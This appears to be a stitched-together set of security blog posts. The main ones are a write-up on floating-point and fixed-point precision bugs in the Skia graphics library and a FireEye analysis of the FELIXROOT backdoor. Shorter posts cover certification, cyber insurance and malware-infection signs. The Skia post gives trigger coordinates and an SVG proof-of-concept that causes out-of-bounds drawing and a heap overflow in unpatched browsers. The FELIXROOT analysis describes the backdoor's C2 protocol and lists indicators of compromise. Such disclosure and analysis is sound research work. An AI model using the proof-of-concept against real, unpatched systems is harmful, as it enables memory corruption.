2858: 2049.331787 2049.331787 the precision errors consistently favour a larger result than the more
2859: 2050.048584 2050.048340 precise calculation.
8129: 5827.567871 5826.924805
8130: 5828.284668 5827.641602
8131: 5829.001465 5828.358398 The last index is now sufficiently different that int conversion results in an oob index.

(Note also that there will also be error in the “safe” calculation; it’s just that the lack of error propagation means that that error will remain directly proportional to the size of the input error, which we expect to be “small.”)

We can indeed see that the multiplicative algorithm would remain within bounds, but that the iterative algorithm can return an index that is outside the bounds of the input texture!

As a result, we read an entire row of pixels past the end of our texture allocation - and this can be easily leaked back to JavaScript using WebGL. Stay tuned for an upcoming blog post in which we’ll use this vulnerability together with another unrelated issue in SwiftShader to take control of the GPU process from JavaScript.


Skia is a graphics library used, among other places, in Chrome, Firefox and Android. In web browsers it is used, for example, when drawing to a canvas HTML element using CanvasRenderingContext2D or when drawing SVG images. Skia is also used when drawing various other HTML elements, but the canvas element and SVG images are more interesting from the security perspective because they give more direct control over the objects being drawn by the graphics library.

The most complex type of object (and therefore, most interesting from the security perspective) that Skia can draw is a path. A path is an object that consists of elements such as lines, but also more complex curves, in particular quadratic or cubic splines.

Due to the way software drawing algorithms work in Skia, precision issues are very much possible, and quite impactful when they happen, typically leading to out-of-bounds writes.

To understand why these issues can happen, let’s assume you have an image in memory (represented as a buffer with size = width x height x color size). Normally, when drawing a pixel with coordinates (x, y) and color c, you would want to make sure that the pixel actually falls within the space of the image, specifically that 0 <= x < width and 0 <= y < height. Failing to check this could result in attempting to write the pixel outside the bounds of the allocated buffer. In computer graphics, making sure that only the objects in the image region are being drawn is called clipping.
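As a concrete illustration, a per-pixel clip check is just a bounds test before each write. This is a minimal sketch; the buffer layout and function name are ours, for illustration only:

```c
#include <assert.h>

enum { WIDTH = 8, HEIGHT = 8 };

static unsigned char image[WIDTH * HEIGHT];  /* one byte per pixel, row by row */

/* Draw one pixel with a per-pixel clip check: writes outside the
 * image region are silently discarded. */
static void put_pixel_clipped(int x, int y, unsigned char c)
{
    if (x < 0 || x >= WIDTH || y < 0 || y >= HEIGHT)
        return;  /* clipped */
    image[y * WIDTH + x] = c;
}
```

Skipping this test is only safe if an earlier, object-level check already guarantees every pixel lands in bounds, which is exactly the assumption the precision errors described below undermine.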

So, where is the problem? Making a clip check for every pixel is expensive in terms of CPU cycles, and Skia prides itself on speed. So, instead of making a clip check for every pixel, Skia first makes the clip check on an entire object (e.g. line, path or any other type of object being drawn). Depending on the clip check, there are three possible outcomes:

  a) The object is completely outside of the drawing area: The drawing function doesn’t draw anything and returns immediately.

  b) The object is partially inside the drawing area: The drawing function proceeds with per-pixel clip enabled (usually by relying on SkRectClipBlitter).

  c) The entire object is in the drawing area: The drawing function draws directly into the buffer without performing per-pixel clip checks.

The problematic scenario is c), where the clip check is performed only per-object and the more precise, per-pixel checks are disabled. This means that if there is a precision issue somewhere between the per-object clip check and the drawing of pixels, and if that precision issue causes the pixel coordinates to go outside of the drawing area, the result could be a security vulnerability.

We can see per-object clip checks leading to dropping per-pixel checks in several places, for example:

  • In hair_path (the function for drawing a path without filling), clip is initially set to null (which disables clip checks). The clip is only set if the bounds of the path, rounded up and extended by 1 or 2 depending on the drawing options, don’t fit in the drawing area. Extending the path bounds by 1 seems like a pretty large safety margin, but it is actually the least possible safe value, because drawing objects with antialiasing on will sometimes result in drawing to nearby pixels.

  • In SkScan::FillPath (function for filling a path with antialiasing turned off), the bounds of the path are first extended by kConservativeRoundBias and rounded to obtain the “conservative” path bounds. A SkScanClipper object is then created for the current path. As we can see in the definition of SkScanClipper, it will only use SkRectClipBlitter if the x coordinates of the path bounds are outside the drawing area or if irPreClipped is true (which only happens when path coordinates are very large).

Similar patterns can be seen in other drawing functions.

Before we take a closer look at the issues, it is useful to quickly go over various number formats used by Skia:

  • SkScalar is a 32-bit floating point number

  • SkFDot6 is defined as an integer, but it is actually a fixed-point number with 26 bits to the left and 6 bits to the right of the decimal point. For example, SkFDot6 value of 0x00000001 represents the number 1/64.

  • SkFixed is also a fixed-point number, this time with 16 bits to the left and 16 bits to the right of the decimal point. For example, the SkFixed value of 0x00000001 represents 1/(2**16).
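To make the two fixed-point formats concrete, here is a small sketch of the conversions back to real numbers (the typedefs mirror Skia's, but the helper names are ours):

```c
#include <assert.h>
#include <stdint.h>

typedef int32_t SkFDot6;   /* 26.6 fixed point: value = raw / 64    */
typedef int32_t SkFixed;   /* 16.16 fixed point: value = raw / 65536 */

static double fdot6_to_double(SkFDot6 v) { return v / 64.0; }
static double fixed_to_double(SkFixed v) { return v / 65536.0; }
```

So SkFDot6 0x00000001 is 1/64, SkFixed 0x00000001 is 1/65536, and SkFDot6 -32 is exactly -0.5, a value that comes up repeatedly below.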

Precision error with integer to float conversion

We discovered the initial problem when doing DOM fuzzing against Firefox last year. This issue, where Skia wrote out-of-bounds, caught our eye, so we investigated further. It turned out the root cause was a discrepancy in the way Skia converted floating-point numbers to integers in several places. When making the per-path clip check, the lower coordinates (left and top of the bounding box) were rounded using this function:

static inline int round_down_to_int(SkScalar x) {
    double xx = x;
    xx -= 0.5;
    return (int)ceil(xx);
}

Looking at the code, you can see that it will return a number greater than or equal to zero (which is necessary for passing the path-level clip check) for numbers that are strictly larger than -0.5. However, in another part of the code, specifically in SkEdge::setLine if SK_RASTERIZE_EVEN_ROUNDING is defined (which is the case in Firefox), floats are rounded to integers differently, using the following function:

inline SkFDot6 SkScalarRoundToFDot6(SkScalar x, int shift = 0) {
    union {
        double fDouble;
        int32_t fBits[2];
    } tmp;
    int fractionalBits = 6 + shift;
    double magic = (1LL << (52 - (fractionalBits))) * 1.5;

    tmp.fDouble = SkScalarToDouble(x) + magic;
#ifdef SK_CPU_BENDIAN
    return tmp.fBits[1];
#else
    return tmp.fBits[0];
#endif
}

Now let’s take a look at what these two functions return for the number -0.499. For this number, round_down_to_int returns 0 (which passes the clipping check), while SkScalarRoundToFDot6 returns -32, which corresponds to -0.5. We actually end up with a number that is smaller than the one we started with.

That’s not the only problem, though, because there’s another place where a precision error occurs in SkEdge::setLine.

Precision error when multiplying fractions

SkEdge::setLine calls SkFixedMul which is defined as:

static inline SkFixed SkFixedMul(SkFixed a, SkFixed b) {
    return (SkFixed)((int64_t)a * b >> 16);
}

This function is for multiplying two SkFixed numbers. An issue comes up when using this function to multiply negative numbers. Let’s look at a small example: assume a = -1/(2**16) and b = 1/(2**16). If we multiply these two numbers on paper, the result is -1/(2**32). However, due to the way SkFixedMul works, specifically because the right shift is used to convert the result back to SkFixed format, the result we actually end up with is 0xFFFFFFFF, which is SkFixed for -1/(2**16). Thus, we end up with a result with a magnitude much larger than expected.
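The behaviour is easy to verify with a standalone copy of the function (the raw SkFixed value -1 means -1/65536, and 1 means 1/65536):

```c
#include <assert.h>
#include <stdint.h>

typedef int32_t SkFixed;   /* 16.16 fixed point */

static SkFixed fixed_mul(SkFixed a, SkFixed b)
{
    /* The >> 16 is an arithmetic shift on the common compilers,
     * so it rounds toward negative infinity, not toward zero. */
    return (SkFixed)(((int64_t)a * b) >> 16);
}
```

For positive operands the shift truncates toward zero (1/65536 * 1/65536 gives raw 0), but a tiny negative product rounds away from zero: -1/65536 * 1/65536 gives raw -1, i.e. -1/(2**16) instead of the true -1/(2**32).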

As the result of this multiplication is used by SkEdge::setLine to adjust the x coordinate of the initial line point, we can use the issue in SkFixedMul to introduce an additional error of up to 1/64 of a pixel, pushing the coordinate outside of the drawing area bounds.

By combining the previous two issues, it was possible to get the x coordinate of a line sufficiently small (smaller than -0.5) that, when its fractional representation was rounded to an integer, Skia attempted to draw at coordinates with x = -1, which is clearly outside the image bounds. This then led to an out-of-bounds write, as can be seen in the original bug report. This bug could be exploited in Firefox by drawing an SVG image with coordinates as described in the previous section.

Floating point precision error when converting splines to line segments

When drawing paths, Skia is going to convert all non-linear curves (conic shapes, quadratic and cubic splines) to line segments. Perhaps unsurprisingly, these conversions suffer from precision errors.

The conversion of splines into line segments happens in several places, but the functions most susceptible to floating-point precision errors are hair_quad (used for drawing quadratic curves) and hair_cubic (used for drawing cubic curves). Both of these functions are called from hair_path, which we already mentioned above. Because, unsurprisingly, larger precision errors occur when dealing with cubic splines, we’ll only consider the cubic case here.

When approximating the spline, first the cubic coefficients are computed in SkCubicCoeff. The most interesting part is:

fA = P3 + three * (P1 - P2) - P0;
fB = three * (P2 - times_2(P1) + P0);
fC = three * (P1 - P0);
fD = P0;

Where P1, P2 and P3 are input points and fA, fB, fC and fD are output coefficients. The line segment points are then computed in hair_cubic using the following code

const Sk2s dt(SK_Scalar1 / lines);
Sk2s t(0);

Sk2s A = coeff.fA;
Sk2s B = coeff.fB;
Sk2s C = coeff.fC;
Sk2s D = coeff.fD;
for (int i = 1; i < lines; ++i) {
    t = t + dt;
    Sk2s p = ((A * t + B) * t + C) * t + D;
    p.store(&tmp[i]);
}

Where p is the output point and lines is the number of line segments we are using to approximate the curve. Depending on the length of the spline, a cubic spline can be approximated with up to 512 lines.

It is obvious that the arithmetic here is not going to be precise. As identical computations happen for x and y coordinates, let’s just consider the x coordinate in the rest of the post.

Let’s assume the width of the drawing area is 1000 pixels. Because hair_path is used for drawing paths with antialiasing turned on, it needs to make sure that all points of the path are between 1 and 999, which is done in the initial, path-level clip check. Let’s consider the following coordinates that all pass this check:

p0 = 1.501923
p1 = 998.468811
p2 = 998.998779
p3 = 999.000000

For these points, the coefficients are as follows

a = 995.908203
b = -2989.310547
c = 2990.900879
d = 1.501923

If you do the same computation in larger precision, you’re going to notice that the numbers here aren’t quite correct. Now let’s see what happens if we approximate the spline with 512 line segments. This results in 513 x coordinates:

0: 1.501923
1: 7.332130
2: 13.139574
3: 18.924301
4: 24.686356
5: 30.425781
500: 998.986389
501: 998.989563
502: 998.992126
503: 998.994141
504: 998.995972
505: 998.997314
506: 998.998291
507: 998.999084
508: 998.999695
509: 998.999878
510: 999.000000
511: 999.000244
512: 999.000000

We can see that the x coordinate keeps growing and at point 511 clearly goes outside of the “safe” area and grows larger than 999.

As it happens, this isn’t sufficient to trigger an out-of-bounds write, because, due to how drawing antialiased lines works in Skia, we need to go at least 1/64 of a pixel outside of the clip area for it to become a security issue. However, an interesting thing about the precision errors in this case is that the larger the drawing area, the larger the error that can happen.

So let’s instead consider a drawing area of 32767 pixels (maximum canvas size in Chrome). The initial clipping check then checks that all path points are in the interval [1, 32766]. Now let’s consider the following points:

p0 = 1.7490234375
p1 = 32765.9902343750
p2 = 32766.000000
p3 = 32766.000000

The corresponding coefficients

a = 32764.222656
b = -98292.687500
c = 98292.726562
d = 1.749023

And the corresponding line approximation

0: 1.74902343
1: 193.352295
2: 384.207123
3: 574.314941
4: 763.677246
5: 952.295532
505: 32765.925781
506: 32765.957031
507: 32765.976562
508: 32765.992188
509: 32766.003906
510: 32766.003906
511: 32766.015625
512: 32766.000000

You can see that we went out-of-bounds significantly more at index 511.

Fortunately for Skia and unfortunately for aspiring attackers, this bug can’t be used to trigger memory corruption, at least not in the up-to-date version of Skia. The reason is SkDrawTiler. Whenever Skia draws using SkBitmapDevice (as opposed to using a GPU device) and the drawing area is larger than 8191 pixels in any dimension, instead of drawing the whole image at once, Skia splits it into tiles of size (at most) 8191x8191 pixels. This change was made in March, not for security reasons, but to be able to support larger drawing surfaces. However, it still effectively prevented us from exploiting this issue, and will also prevent exploiting other cases where a surface larger than 8191 pixels is required to reach a precision error of sufficient magnitude.

Still, this bug was exploitable before March and we think it nicely demonstrates the concept of precision errors.

Integer precision error when converting splines to line segments

There is another place where splines are approximated as line segments when drawing (in this case: filling) paths that was also affected by a precision error, in this case an exploitable one. Interestingly, here the precision error wasn’t in floating-point but rather in fixed-point arithmetic.

The error happens in SkQuadraticEdge::setQuadraticWithoutUpdate and SkCubicEdge::setCubicWithoutUpdate. For simplicity, we are again going to concentrate just on the cubic spline version and, again, only on the x coordinate.

In SkCubicEdge::setCubicWithoutUpdate, the curve coordinates are first converted to SkFDot6 type (integer with 6 bits used for fraction). After that, parameters corresponding to the first, second and third derivative of the curve at the initial point are going to be computed:

SkFixed B = SkFDot6UpShift(3 * (x1 - x0), upShift);
SkFixed C = SkFDot6UpShift(3 * (x0 - x1 - x1 + x2), upShift);
SkFixed D = SkFDot6UpShift(x3 + 3 * (x1 - x2) - x0, upShift);

fCx     = SkFDot6ToFixed(x0);
fCDx    = B + (C >> shift) + (D >> 2*shift);    // biased by shift
fCDDx   = 2*C + (3*D >> (shift - 1));           // biased by 2*shift
fCDDDx  = 3*D >> (shift - 1);                   // biased by 2*shift

Where x0, x1, x2 and x3 are x coordinates of the 4 points that define the cubic spline and shift and upShift depend on the length of the curve (this corresponds to the number of linear segments the curve is going to be approximated in). For simplicity, we can assume shift = upShift = 6 (maximum possible values).

Now let’s see what happens for some very simple input values:

x0 = -30
x1 = -31
x2 = -31
x3 = -31

Note that x0, x1, x2 and x3 are of the type SkFDot6 so value -30 corresponds to -0.46875 and -31 to -0.484375. These are close to -0.5 but not quite and are thus perfectly safe when rounded. Now let’s examine the values of the computed parameters:

B = -192
C = 192
D = -64

fCx = -30720
fCDx = -190
fCDDx = 378
fCDDDx = -6

Do you see where the issue is? Hint: it’s in the formula for fCDx.

When computing fCDx (the first derivative of the curve), the value of D needs to be right-shifted by 12. However, D is too small for that to be done precisely, and since D is negative, the right shift

D >> 2*shift

is going to result in -1, which is larger in magnitude than the intended result. (Since D is of type SkFixed, its actual value is -0.0009765625, and the shift, when interpreted as division by 4096, should result in -2.384185e-07.) Because of this, the whole fCDx ends up as a larger negative value than it should be (-190 vs. -189.015).

Afterwards, the value of fCDx gets used when calculating the x value of line segments. This happens in SkCubicEdge::updateCubic on this line:

newx    = oldx + (fCDx >> dshift);

The x values, when approximating the spline with 64 line segments (maximum for this algorithm), are going to be (expressed as index, integer SkFixed value and the corresponding floating point value):

index raw      interpretation
0:    -30720   -0.46875
1:    -30768   -0.469482
2:    -30815   -0.470200
3:    -30860   -0.470886
4:    -30904   -0.471558
5:    -30947   -0.472214
31:   -31683   -0.483444
32:   -31700   -0.483704
33:   -31716   -0.483948
34:   -31732   -0.484192
35:   -31747   -0.484421
36:   -31762   -0.484650
37:   -31776   -0.484863
38:   -31790   -0.485077
60:   -32005   -0.488358
61:   -32013   -0.488480
62:   -32021   -0.488602
63:   -32029   -0.488724
64:   -32037   -0.488846

You can see that for the 35th point, the x value (-0.484421) ends up being smaller than the smallest input point (-0.484375), and the trend continues for the later points. This value would still get rounded to 0, though, but there is another problem.

The x values computed in SkCubicEdge::updateCubic are passed to SkEdge::updateLine, where they are converted from SkFixed type to SkFDot6 on the following lines:

x0 >>= 10;
x1 >>= 10;

Another right shift! And when, for example, SkFixed value -31747 gets shifted we end up with SkFDot6 value of -32 which represents -0.5.

At this point we can use the same trick described above in the “Precision error when multiplying fractions” section to go smaller than -0.5 and break out of the image bounds. In other words, we can make Skia draw to x = -1 when drawing a path.

But, what can we do with it?

In general, given that Skia allocates image pixels as a single allocation that is organized row by row (as most other software would allocate bitmaps), there are several cases of what can happen with precision issues. If we assume a width x height image and that we are only able to go one pixel out of bounds:

  1. Drawing to y = -1 or y = height immediately leads to a heap out-of-bounds write
  2. Drawing to x = -1 with y = 0 immediately leads to a heap underflow of 1 pixel
  3. Drawing to x = width with y = height - 1 immediately leads to a heap overflow of 1 pixel
  4. Drawing to x = -1 with y > 0 leads to a pixel “spilling” to the previous image row
  5. Drawing to x = width with y < height - 1 leads to a pixel “spilling” to the next image row

What we have here is scenario 4 - unfortunately we can’t draw to x = -1 with y = 0 because the precision error needs to accumulate over the growing values of y.

Let’s take a look at the following example SVG image:

<svg width="100" height="100" xmlns="http://www.w3.org/2000/svg">
  <path d="M -0.46875 -0.484375 C -0.484375 -0.484375, -0.484375 -0.484375, -0.484375 100 L 1 100 L 1 -0.484375" fill="red" shape-rendering="crispEdges" />
</svg>

If we render this in an unpatched version of Firefox what we see is shown in the following image. Notice how the SVG only contains coordinates on the left side of the screen, but some of the red pixels get drawn on the right. This is because, due to the way images are allocated, drawing to x = -1 and y = row is equal to drawing to x = width - 1 and y = row - 1.

Opening an SVG image that triggers a Skia precision issue in Firefox. If you look closely you’ll notice some red pixels on the right side of the image. How did those get there? :)

Note that we used Mozilla Firefox and not Google Chrome because, due to SVG drawing internals (specifically: Firefox seems to draw the entire image at once, while Chrome uses additional tiling), it is easier to demonstrate the issue in Firefox. However, both Chrome and Firefox were equally affected by this issue.

But, other than drawing a funny image, is there real security impact to this issue? Here, SkARGB32_Shader_Blitter comes to the rescue (SkARGB32_Shader_Blitter is used whenever shader effects are applied to a color in Skia). What is specific about SkARGB32_Shader_Blitter is that it allocates a temporary buffer of the same size as a single image row. When SkARGB32_Shader_Blitter::blitH is used to draw an entire image row, if we can make it draw from x = -1 to x = width - 1 (alternately from x = 0 to x = width), it will need to write width + 1 pixels into a buffer that can only hold width pixels, leading to a buffer overflow as can be seen in the ASan log in the bug report.

Note how the PoCs for Chrome and Firefox contain SVG images with a linearGradient element - the linear gradient is used specifically to select SkARGB32_Shader_Blitter instead of drawing pixels to the image directly, which would only result in pixels spilling to the previous row.

Another specific aspect of this issue is that it can only be reached when drawing (more specifically: filling) paths with antialiasing turned off. As it is not currently possible to draw paths to an HTML canvas element with antialiasing off (there is an imageSmoothingEnabled property but it only applies to drawing images, not paths), an SVG image with shape-rendering="crispEdges" must be used to trigger the issue.

All precision issues we reported in Skia were fixed by increasing kConservativeRoundBias. While the current bias value is large enough to cover the maximum precision errors we know about, we should not dismiss the possibility of other places where precision issues can occur.


While precision issues such as those described in this blog post won’t be present in most software products, where they are present they can have quite serious consequences. To prevent them from occurring:

  • Don’t use floating-point arithmetic in cases where the result is security-sensitive. If you absolutely have to, then you need to make sure that the maximum possible precision error cannot be larger than some safety margin. Potentially, interval arithmetic could be used to determine the maximum precision error in some cases. Alternately, perform security checks on the result rather than input.

  • With integer arithmetic, be wary of any operations that can reduce the precision of the result, such as divisions and right shifts.

When it comes to finding such issues, unfortunately, there doesn’t seem to be a great way to do it. When we started looking at Skia, initially we wanted to try using symbolic execution on the drawing algorithms to find input values that would lead to drawing out-of-bounds, as, on the surface, it seemed like a problem symbolic execution would be well suited for. However, in practice, there were too many issues: most tools don’t support floating point symbolic variables and, even when running against just the integer parts of the simplest line drawing algorithm, we were unsuccessful in completing the run in a reasonable time (we were using KLEE with STP and Z3 backends).

In the end, what we ended up doing was a combination of the more old-school methods: manual source review, fuzzing (especially with values close to image boundaries) and, in some cases, when we already identified potentially problematic areas of code, even bruteforcing the range of all possible values.

Do you know of other instances where precision errors resulted in security issues? Let us know about them in the comments.

Offensive Security Online Exam Proctoring

When we started out with our online training courses over 12 years ago, we made hard choices about the nature of our courses and certifications. We went against the grain, against the common certification standards, and came up with a unique certification model in the field - "Hands-on, practical certification". Twelve years later, these choices have paid off. The industry as a whole has realized that most of the multiple choice, technical certifications do not necessarily guarantee a candidate's technical level...and for many in the offensive security field, the OSCP has turned into a golden industry standard. This has been wonderful for certification holders as they find themselves actively recruited by employers due to the fact that they have proven themselves as being able to stand up to the stress of a hard, 24-hour exam - and still deliver a quality report.

Insurance Occurrence Assurance?

You may have seen my friend Brian Krebs’ post regarding the lawsuit filed last month in the Western District of Virginia after $2.4 million was stolen from The National Bank of Blacksburg in two separate breaches over an eight-month period. Though the breaches are concerning, the real story is that the financial institution is suing its insurance provider for refusing to fully cover the losses.

From the article:

In its lawsuit (PDF), National Bank says it had an insurance policy with Everest National Insurance Company for two types of coverage or “riders” to protect it against cybercrime losses. The first was a “computer and electronic crime” (C&E) rider that had a single loss limit liability of $8 million, with a $125,000 deductible.

The second was a “debit card rider” which provided coverage for losses which result directly from the use of lost, stolen or altered debit cards or counterfeit cards. That policy has a single loss limit of liability of $50,000, with a $25,000 deductible and an aggregate limit of $250,000.

According to the lawsuit, in June 2018 Everest determined both the 2016 and 2017 breaches were covered exclusively by the debit card rider, and not the $8 million C&E rider. The insurance company said the bank could not recover lost funds under the C&E rider because of two “exclusions” in that rider which spell out circumstances under which the insurer will not provide reimbursement.

Cyber security insurance is still in its infancy and issues with claims that could potentially span multiple policies and riders will continue to happen – think of the stories of health insurance claims being denied for pre-existing conditions and other loopholes. This, unfortunately, is the nature of insurance. Legal precedent, litigation, and insurance claim issues aside, your organization needs to understand that cyber security insurance is but one tool to reduce the financial impact on your organization when faced with a breach.

Cyber security insurance cannot and should not, however, be viewed as your primary means of defending against an attack.

The best way to maintain a defensible security posture is to have an information security program that is current, robust, and measurable. An effective information security program will provide far more protection for the operational state of your organization than cyber security insurance alone. To put it another way, insurance is a reactive measure whereas an effective security program is a proactive measure.

If you were in a fight, would you want to wait and see what happens after a punch is thrown to the bridge of your nose? Perhaps you would like to train to dodge or block that punch instead? Something to think about.

Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign

Campaign Details

In September 2017, FireEye identified the FELIXROOT backdoor as a payload in a campaign targeting Ukrainians and reported it to our intelligence customers. The campaign involved malicious Ukrainian bank documents, which contained a macro that downloaded a FELIXROOT payload, being distributed to targets.

FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine. Figure 1 shows the attack overview.

Figure 1: Attack overview

The malware is distributed via Russian-language documents (Figure 2) that are weaponized with known Microsoft Office vulnerabilities. In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware. The malicious document used is named “Seminar.rtf”. It exploits CVE-2017-0199 to download the second stage payload from (Figure 3). The downloaded file is weaponized with CVE-2017-11882.

Figure 2: Lure documents

Figure 3: Hex dump of embedded URL in Seminar.rtf

Figure 4 shows the first payload trying to download the second stage Seminar.rtf.

Figure 4: Downloading second stage Seminar.rtf

The downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via the Equation Editor executable. The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) is used to drop and execute the FELIXROOT dropper component (MD5: 92F63B1227A6B37335495F9BCB939EA2).

The dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section. When it is executed, it creates two files: an LNK file that points to %system32%\rundll32.exe, and the FELIXROOT loader component. The LNK file is moved to the startup directory. Figure 5 shows the command in the LNK file to execute the loader component of FELIXROOT.

Figure 5: Command in LNK file

The embedded backdoor component is encrypted using custom encryption. The file is decrypted and loaded directly in memory without touching the disk.

Technical Details

After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.

Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key. Decryption logic used for ASCII strings is shown in Figure 6.

Figure 6: ASCII decryption routine

Decryption logic used for Unicode strings is shown in Figure 7.

Figure 7: Unicode decryption routine

Upon execution, a new thread is created where the backdoor sleeps for 10 minutes. Then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If the malware was launched by RUNDLL32.exe with parameter #1, then it proceeds with initial system triage before doing command and control (C2) network communications. Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the “ROOT\CIMV2” namespace.

Figure 8 shows the full operation.

Figure 8: Initial execution process of backdoor component

Table 1 shows the classes referred from the “ROOT\CIMV2” and “Root\SecurityCenter2” namespace.

WMI Namespaces

Table 1: Referred classes

WMI Queries and Registry Keys Used

  1. SELECT Caption FROM Win32_TimeZone
  2. SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser FROM Win32_OperatingSystem
  3. SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName FROM Win32_ComputerSystem

Registry entries are read for potential administration escalation and proxy information.

  1. Registry key “SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System” is queried to check the values ConsentPromptBehaviorAdmin and PromptOnSecureDesktop.
  2. Registry key “Software\Microsoft\Windows\CurrentVersion\Internet Settings\” is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer.

Table 2 shows FELIXROOT backdoor capabilities. Each command is performed in an individual thread.

  • Fingerprint system via WMI and registry
  • Drop file and execute
  • Remote shell
  • Terminate connection with C2
  • Download and run batch script
  • Download file on machine
  • Upload file

Table 2: FELIXROOT backdoor commands

Figure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed.

Figure 9: Command logs after execution

Network Communications

FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server (Figure 10).

Figure 10: POST request to C2 server

All other fields that are part of the request / response headers, such as User-Agent, Content-Type, and Accept-Encoding, are XOR encrypted and present in the malware binary. The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, and processor architecture, plus two additional values, which are “1.3” and “KdfrJKN”. The value “KdfrJKN” may be used as identification for the campaign and is found in the JSON object in the file (Figure 11).

Figure 11: Host information used in every communication

The FELIXROOT backdoor has three parameters for C2 communication. Each parameter provides information about the task performed on the target machine (Table 3).

  • The first parameter contains target machine information in the following format: <Computer Name>, <User Name>, <Windows Versions>, <Processor Architecture>, <1.3>, <KdfrJKN>, <Volume Serial Number>
  • The second parameter includes information about the command executed and its results.
  • The third parameter contains information about data associated with the C2 server.

Table 3: FELIXROOT backdoor parameters


All data is transferred to the C2 servers using AES encryption and the IBindCtx COM interface over the HTTP or HTTPS protocol. The AES key is unique for each communication and is encrypted with one of two RSA public keys. Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters.

Figure 12: RSA public key 1

Figure 13: RSA public key 2

Figure 14: AES encryption parameters

After encryption, the cipher text to be sent over C2 is Base64 encoded. Figure 15 shows the structure used to send data to the server, and Figure 16 shows the structural representation of data used in C2 communications.

Figure 15: Structure used to send data to server

Figure 16: Structure used to send data to C2 server

The structure is converted to Base64 using the CryptBinaryToStringA function.

FELIXROOT backdoor contains several commands for specific tasks. After execution of every task, the malware sleeps for one minute before executing the next task. Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine:

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open.
  3. Deletes the dropper components from the system.


CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected. At the time of writing, the FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. We also advise that all industries remain on alert, as the threat actors involved in this campaign may eventually broaden the scope of their current targeting.


Indicators of Compromise

Network Indicators of Compromise

Accept-Encoding: gzip, deflate

content-Type: application/x-www-form-urlencoded

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Configuration Files

Version 1:

{"1" : "","2" : "30","4" : "GufseGHbc","6" : "3", "7" :


Version 2:

{"1" : "","2" : "30","4" : "KdfrJKN","6" : "3", "7" :


FireEye Detections

Table 5: FireEye Detections


Special thanks to Jonell Baltazar, Alex Berry and Benjamin Read for their contributions to this blog.

Top 10 Signs of a Malware Infection on Your PC

Not all viruses that find their way onto your computer dramatically crash your machine. Instead, there are viruses that can run in the background without you even realizing it. As they creep around, they make messes, steal, and much worse.

Malware today spies on your every move. It sees the websites you visit and the usernames and passwords you type in. If you log in to online banking, a criminal can watch what you do, and after you log off and go to bed, he can log right back in and start transferring money out of your account.

Here are some signs that your device might already be infected with malware:

  1. Programs shut down or start up automatically
  2. Windows suddenly shuts down without prompting
  3. Programs won’t start when you want them to
  4. The hard drive is constantly working
  5. Your machine is working slower than usual
  6. Messages appear spontaneously
  7. Instead of flickering, your external modem light is constantly lit
  8. Your mouse pointer moves by itself
  9. Applications are running that are unfamiliar
  10. Your identity gets stolen

If you notice any of these, first, don’t panic. It’s not 100% certain that you have a virus. However, you should check things out. Make sure your antivirus program is scanning your computer regularly and is set to automatically download software updates. This is one of the best lines of defense you have against malware.

Though we won’t ever eliminate malware, as it is always being created and evolving, by using antivirus software and other layers of protection, you can be one step ahead. Here are some tips:

  • Run an automatic antivirus scan of your computer every day. You can choose the quick scan option for this. However, each week, run a deep scan of your system. You can run them manually, or you can schedule them.
  • Even if you have purchased the best antivirus software on the market, if you aren’t updating it, you are not protected.
  • Don’t click on any attachment in an email, even if you think you know who it is from. Instead, before you open it, confirm that the attachment was sent by the person you think sent it, and scan it with your antivirus program.
  • Do not click on any link seen in an email, unless it is from someone who often sends them. Even then, be on alert as hackers are quite skilled at making fake emails look remarkably real. If you question it, make sure to open a new email and ask the person. Don’t just reply to the one you are questioning. Also, never click on any link that is supposedly from your bank, the IRS, a retailer, etc. These are often fake.
  • If your bank sends e-statements, ignore the links and log in directly to the bank’s website using either a password manager or your bookmarks.
  • Set your email software to “display text only.” This way, you are alerted before graphics or links load.

